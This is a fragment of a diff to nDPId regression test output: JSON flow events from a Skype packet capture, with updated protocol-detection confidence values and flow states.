00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713815,"flow_last_seen":1431969726847,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -1191,15 +1191,15 @@ 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969675056,"flow_last_seen":1431969702873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969677018,"flow_last_seen":1431969694645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50063,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
@@ -1209,54 +1209,54 @@ 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969697097,"flow_last_seen":1431969714913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50087,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431969706277,"flow_last_seen":1431969719939,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":50100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":200000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969668503,"flow_last_seen":1431969788519,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1431969728749,"flow_last_seen":1431969734854,"flow_idle_time":200000,"flow_min_l4_payload_len":433,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":6693,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969643093,"flow_last_seen":1431969698671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969649862,"flow_last_seen":1431969790906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":954,"flow_tot_l4_payload_len":4924,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1431969793871,"flow_last_seen":1431969802019,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55893,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714398,"flow_last_seen":1431969733216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969717177,"flow_last_seen":1431969730486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50123,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
